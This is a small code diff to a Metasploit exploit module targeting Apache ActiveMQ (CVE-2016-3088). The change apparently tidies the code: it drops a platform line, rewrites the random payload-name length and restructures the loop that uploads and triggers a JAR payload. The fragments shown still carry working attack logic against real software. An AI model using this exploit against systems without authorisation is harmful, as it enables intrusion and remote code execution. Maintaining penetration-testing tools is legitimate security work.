@@ -25,7 +25,6 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt' ]
         ],
         'Privileged' => true,
-        'Platform' => %w{java linux win},
         'Targets' => [
           [
             'Java Universal',
@@ -87,16 +86,15 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     jar_payload = payload.encoded_jar.pack
-    payload_name = datastore['JSP'] || rand_text_alpha(8 + rand(8))
+    payload_name = datastore['JSP'] || rand_text_alpha(rand(8..15))
     host = "#{datastore['RHOST']}:#{datastore['RPORT']}"
     @url = datastore['SSL'] ? "https://#{host}" : "http://#{host}"
     paths = get_upload_paths
     paths.each do |path|
-      if try_upload(path, jar_payload, payload_name)
-        break handler if trigger_payload(payload_name)
+      next unless try_upload(path, jar_payload, payload_name)
+      break handler if trigger_payload(payload_name)
 
-        print_error('Unable to trigger payload')
-      end
+      print_error('Unable to trigger payload')
     end
   end
 
